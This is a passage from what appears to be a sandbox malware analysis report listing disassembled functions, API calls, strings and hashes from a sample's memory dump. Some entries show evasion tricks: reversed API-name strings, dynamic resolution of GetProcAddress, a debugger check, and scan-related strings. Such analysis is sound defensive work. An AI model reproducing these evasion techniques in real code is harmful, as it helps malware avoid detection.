GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02D9D29D

Part of subcall function 02D9D268: GetProcAddress.KERNEL32(00000000), ref: 02D9D281

Strings

VarBstrFromDate, xrefs: 02D9D463
VarNot, xrefs: 02D9D2D7
VarNeg, xrefs: 02D9D2C1
VarI4FromStr, xrefs: 02D9D3C9
VarCmp, xrefs: 02D9D3B3
VarMul, xrefs: 02D9D319
VarOr, xrefs: 02D9D387
VarBstrFromCy, xrefs: 02D9D44D
VarBstrFromBool, xrefs: 02D9D479
VarR4FromStr, xrefs: 02D9D3DF
VarSub, xrefs: 02D9D303
VarIdiv, xrefs: 02D9D345
VarDiv, xrefs: 02D9D32F
VarMod, xrefs: 02D9D35B
oleaut32.dll, xrefs: 02D9D298
VarAdd, xrefs: 02D9D2ED
VarBoolFromStr, xrefs: 02D9D437
VarCyFromStr, xrefs: 02D9D421
VarDateFromStr, xrefs: 02D9D40B
VarAnd, xrefs: 02D9D371
VariantChangeTypeEx, xrefs: 02D9D2AB
VarXor, xrefs: 02D9D39D
VarR8FromStr, xrefs: 02D9D3F5

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
API String ID: 1646373207-1918263038
Opcode ID: 7d07a3c13261286f1eac8abac49f239f903ab51463f09a9a1e76b064c8db6708
Instruction ID: 34568ece07d5a68623b4e749bf68aa432c6542766bbafd765408f45a4c10a124
Opcode Fuzzy Hash: 7d07a3c13261286f1eac8abac49f239f903ab51463f09a9a1e76b064c8db6708
Instruction Fuzzy Hash: AF4106B1AD93085B5F187A6E7500427B7DFD749B147E0862BF4098B784EA30FC92CA79

Function 02DA6ED8 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ole32.dll), ref: 02DA6EDE
GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02DA6EEF
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02DA6EFF
GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02DA6F0F
GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02DA6F1F
GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02DA6F2F
GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02DA6F3F

Strings

CoInitializeEx, xrefs: 02DA6EF9
CoCreateInstanceEx, xrefs: 02DA6EE9
CoReleaseServerProcess, xrefs: 02DA6F19
ole32.dll, xrefs: 02DA6ED9
CoAddRefServerProcess, xrefs: 02DA6F09
CoSuspendClassObjects, xrefs: 02DA6F39
CoResumeClassObjects, xrefs: 02DA6F29

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
API String ID: 667068680-2233174745
Opcode ID: b0dae3a6009d96837efa8d7ed6458baabde6be9e5ca0ebe87691b659dd2f8f3e
Instruction ID: 8234e854911209a357aa7ca5eeec2f72645003db2437934af6ca0e63f60ff954
Opcode Fuzzy Hash: b0dae3a6009d96837efa8d7ed6458baabde6be9e5ca0ebe87691b659dd2f8f3e
Instruction Fuzzy Hash: E5F04CF2A8C3C0EDBF01BB716CA5C66275DE525604B482C95B90356786E775DC188FE0

Function 02D92530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02D928CE

Strings

String, xrefs: 02D927A1
Unexpected Memory Leak, xrefs: 02D928C0
7, xrefs: 02D926A1
, xrefs: 02D92814
Unknown, xrefs: 02D9278C
The unexpected small block leaks are:, xrefs: 02D92707
An unexpected memory leak has occurred. , xrefs: 02D92690
bytes: , xrefs: 02D9275D
The sizes of unexpected leaked medium and large blocks are: , xrefs: 02D92849

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: Message
String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
API String ID: 2030045667-32948583
Opcode ID: b98259e8c62f5a43edc6e038600a49923145ce7e00144a5aaa7430f8ecebc42f
Instruction ID: 3ec56bbe937314de173853cf533988ce587f981e95e91668138863c573b42fe7
Opcode Fuzzy Hash: b98259e8c62f5a43edc6e038600a49923145ce7e00144a5aaa7430f8ecebc42f
Instruction Fuzzy Hash: 9BA1C530A04294AFDF21AA2CCC88BD976E5EB09350F1441E5FD49AB385CB758D89CF61

Function 02D9252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON

Download Yara Rule

Strings

Unexpected Memory Leak, xrefs: 02D928C0
7, xrefs: 02D926A1
, xrefs: 02D92814
The unexpected small block leaks are:, xrefs: 02D92707
An unexpected memory leak has occurred. , xrefs: 02D92690
bytes: , xrefs: 02D9275D
The sizes of unexpected leaked medium and large blocks are: , xrefs: 02D92849

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID:
String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
API String ID: 0-2723507874
Opcode ID: c6086a7407cb42b1a050c603592f294ada2529b363e736c15cbd25f34310e2d6
Instruction ID: b9a08a9132b7936c40d5ff56af2c122dbe037e3bf052b2b5e4808cffea62633b
Opcode Fuzzy Hash: c6086a7407cb42b1a050c603592f294ada2529b363e736c15cbd25f34310e2d6
Instruction Fuzzy Hash: 3971B430A04298AFDF21AB2CCC88BD9B6E5EB09714F1041E5F949A7381DB758DC5CF61

Function 02D9BDC0 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000000,02D9C08B,?,?,00000000,00000000), ref: 02D9BDF6

Part of subcall function 02D9A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02D9A7E2

Strings

AMPM , xrefs: 02D9C019
AMPM, xrefs: 02D9C00A
mmmm d, yyyy, xrefs: 02D9BEF2
m/d/yy, xrefs: 02D9BEC5
:mm, xrefs: 02D9C029
:mm:ss, xrefs: 02D9C046

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: 2723cdefa4fe4befb786b96b7d23fdb37a69969bd4f3f63cd272b93b4e2e1a32
Instruction ID: e58c752f38e27c2c4adfac8907bcd01f1deea9855f814e6f1f15e9fb079855ca
Opcode Fuzzy Hash: 2723cdefa4fe4befb786b96b7d23fdb37a69969bd4f3f63cd272b93b4e2e1a32
Instruction Fuzzy Hash: C5613C35B602489BDF00EBA4D850A9FB7BBDB88304F609836B105AB345DA39DD46CF75

Function 02DAAFE0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004), ref: 02DAB000
GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02DAB017
IsBadReadPtr.KERNEL32(?,00000004), ref: 02DAB0AB
IsBadReadPtr.KERNEL32(?,00000002), ref: 02DAB0B7
IsBadReadPtr.KERNEL32(?,00000014), ref: 02DAB0CB

Strings

LoadLibraryExA, xrefs: 02DAB00D
KernelBase, xrefs: 02DAB012

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: Read$HandleModule
String ID: KernelBase$LoadLibraryExA
API String ID: 2226866862-113032527
Opcode ID: 7da72b575541ff5d4a404bb494bebc525c64958c8b3ff8c0588f30a39b1766ba
Instruction ID: edd6b98e104a15031bc33b7d85af169d0b491eff5b7b844f673421b41ae872c9
Opcode Fuzzy Hash: 7da72b575541ff5d4a404bb494bebc525c64958c8b3ff8c0588f30a39b1766ba
Instruction Fuzzy Hash: 1F315EB1A40205ABDB20DB69CC96F6A77A8EF16358F104555FA24EB3C0D370ED51CBA4

Function 02D9435C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02D94423,?,?,02E167C8,?,?,02DBE7A8,02D965B1,02DBD30D), ref: 02D94395
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02D94423,?,?,02E167C8,?,?,02DBE7A8,02D965B1,02DBD30D), ref: 02D9439B
GetStdHandle.KERNEL32(000000F5,02D943E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02D94423,?,?,02E167C8), ref: 02D943B0
WriteFile.KERNEL32(00000000,000000F5,02D943E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02D94423,?,?), ref: 02D943B6
MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02D943D4

Strings

Error, xrefs: 02D943C8
Runtime error at 00000000, xrefs: 02D9438E, 02D943CD

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: 3f9026fc5849f8a9805a1228ad6ee5ea796378be882c1b08ea49faf392b39757
Instruction ID: 1cd3d28096e60237142d43ad0d83f0efbb485241908cd72027652ffad243796f
Opcode Fuzzy Hash: 3f9026fc5849f8a9805a1228ad6ee5ea796378be882c1b08ea49faf392b39757
Instruction Fuzzy Hash: 1FF0F670AC4300B5FF11A6B07C06F99239C8704F11F900615B359667D2C7E48CC9CB22

Function 02D9AEC4 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 02D9AD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02D9AD59
Part of subcall function 02D9AD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02D9AD7D
Part of subcall function 02D9AD3C: GetModuleFileNameA.KERNEL32(02D90000,?,00000105), ref: 02D9AD98
Part of subcall function 02D9AD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02D9AE2E

CharToOemA.USER32(?,?), ref: 02D9AEFB
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02D9AF18
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02D9AF1E
GetStdHandle.KERNEL32(000000F4,02D9AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02D9AF33
WriteFile.KERNEL32(00000000,000000F4,02D9AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02D9AF39
LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02D9AF5B
MessageBoxA.USER32(00000000,?,?,00002010), ref: 02D9AF71

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
String ID:
API String ID: 185507032-0
Opcode ID: a198bed0990c4f155f5ef5946243959fdb4bffc96d035a53acae209d83c5fbdd
Instruction ID: f6707ab7884fae815d333a40dacc8646029726dc7faa320c70ad59402e661a09
Opcode Fuzzy Hash: a198bed0990c4f155f5ef5946243959fdb4bffc96d035a53acae209d83c5fbdd
Instruction Fuzzy Hash: 54112AB2588200BADB00FFA4DC85F9B77EDEB45700F804A65B754D62E0DA75ED448BB2

Function 02D9E58C Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02D9E625
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02D9E641
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02D9E67A
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02D9E6F7
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02D9E710
VariantCopy.OLEAUT32(?,00000000), ref: 02D9E745

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-0
Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction ID: f4939affb736649a70b03418cd589951cb0d84c3695f56fd838d66d067a0b99a
Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction Fuzzy Hash: 3151F7759012299BCF62EB58C980BD9B3BDEF49300F4045D6FA08E7312DA30AF858F61

Function 02D93598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02D935BA
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02D93609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02D935ED
RegCloseKey.ADVAPI32(?,02D93610,00000000,?,00000004,00000000,02D93609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02D93603

Strings

FPUMaskValue, xrefs: 02D935E4
SOFTWARE\Borland\Delphi\RTL, xrefs: 02D935B0

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: 3b7c0b4aba30866d26b6bdecf72e6f00425baa982866c7222c27dfed95d94f42
Instruction ID: 2cae4391a1863a40d61b695cfb39e717eb6548d7b9206fb1368c3533a0bcc8af
Opcode Fuzzy Hash: 3b7c0b4aba30866d26b6bdecf72e6f00425baa982866c7222c27dfed95d94f42
Instruction Fuzzy Hash: 9B01B175944258FAEF11EBD0DD02BBD77ECDB08B00F6045A2BA04D7780E674AE14CA69

Function 02DA8274 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DA82FC,?,?,00000000,00000000,?,02DA8215,00000000,KernelBASE,00000000,00000000,02DA823C), ref: 02DA82C1
GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DA82C7
GetProcAddress.KERNEL32(?,?), ref: 02DA82D9

Strings

sserddAcorPteG, xrefs: 02DA828F
Kernel32, xrefs: 02DA82BC

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: Kernel32$sserddAcorPteG
API String ID: 667068680-1372893251
Opcode ID: 2fce90ccc9f31b70f62eea0d45e0a7387e86c85bfa059fd2c4ecd7080a67225d
Instruction ID: 69c438eb176d5fa5f049914b5e366ee7b4cef872f697371db0e24ada63bcc9f0
Opcode Fuzzy Hash: 2fce90ccc9f31b70f62eea0d45e0a7387e86c85bfa059fd2c4ecd7080a67225d
Instruction Fuzzy Hash: C3014F75684344BFEB00EFA4EC51E9EB7EEEB49B00F918460B800D7741D670AE41DA64

Function 02D9AA50 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,02D9AAE7,?,?,00000000), ref: 02D9AA68

Part of subcall function 02D9A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02D9A7E2

GetThreadLocale.KERNEL32(00000000,00000004,00000000,02D9AAE7,?,?,00000000), ref: 02D9AA98
EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 02D9AAA3
GetThreadLocale.KERNEL32(00000000,00000003,00000000,02D9AAE7,?,?,00000000), ref: 02D9AAC1
EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 02D9AACC

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: c7943ed151928a281e7ff26cae3aa936b106ba6122b34431080070cdb08e6f79
Instruction ID: 8e48db8808a9a2b00455a2f1b81d8f156d655ad4fadfc7561da1c9251d72294c
Opcode Fuzzy Hash: c7943ed151928a281e7ff26cae3aa936b106ba6122b34431080070cdb08e6f79
Instruction Fuzzy Hash: FF01A2B62442847FFF11BA64DD12B6A776DDB86710F6105A0F400A67C0D675DE008BB4

Function 02D9AB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,02D9ACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02D9AB2F

Part of subcall function 02D9A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02D9A7E2

Strings

ggg, xrefs: 02D9AC15
yyyy, xrefs: 02D9AC25
eeee, xrefs: 02D9AC3E

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: 5174306ac5f844e949e0b0b632ded3f6bdbb6dc591ba0c330ebd54afda2b3b39
Instruction ID: 4e881c8d3c0cb642318f4060a1cd0493329d10056082a6b633dac3268c1ec5fd
Opcode Fuzzy Hash: 5174306ac5f844e949e0b0b632ded3f6bdbb6dc591ba0c330ebd54afda2b3b39
Instruction Fuzzy Hash: E941D37B7041084BDF11EB7988906BEB3EBDB86208F644526F492CB345EA35ED02CA75

Function 02DA81CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DA823C,?,?,00000000,?,02DA7A7E,ntdll,00000000,00000000,02DA7AC3,?,?,00000000), ref: 02DA820A

Part of subcall function 02DA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DA82FC,?,?,00000000,00000000,?,02DA8215,00000000,KernelBASE,00000000,00000000,02DA823C), ref: 02DA82C1
Part of subcall function 02DA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DA82C7
Part of subcall function 02DA8274: GetProcAddress.KERNEL32(?,?), ref: 02DA82D9

GetModuleHandleA.KERNELBASE(?), ref: 02DA821E

Strings

AeldnaHeludoMteG, xrefs: 02DA81E5
KernelBASE, xrefs: 02DA8205

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: HandleModule$AddressProc
String ID: AeldnaHeludoMteG$KernelBASE
API String ID: 1883125708-1952140341
Opcode ID: 4b1c0bcc23a312b2ef92a307332141ee665bfccc4588824a6a4527fd6b27bd1e
Instruction ID: c24113dd9728dfbc18f89cf37ffcacefcbb447de99a598a789c80f9e6440c725
Opcode Fuzzy Hash: 4b1c0bcc23a312b2ef92a307332141ee665bfccc4588824a6a4527fd6b27bd1e
Instruction Fuzzy Hash: CEF06271A84704AFEB00EFA5EC21D69B7EEE74AB00B918870F800C3710D774AE109A74

Function 02DAF6E8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KernelBase,?,02DAFAEB,UacInitialize,02E17380,02DBB7B8,OpenSession,02E17380,02DBB7B8,ScanBuffer,02E17380,02DBB7B8,ScanString,02E17380,02DBB7B8,Initialize), ref: 02DAF6EE
GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02DAF700

Strings
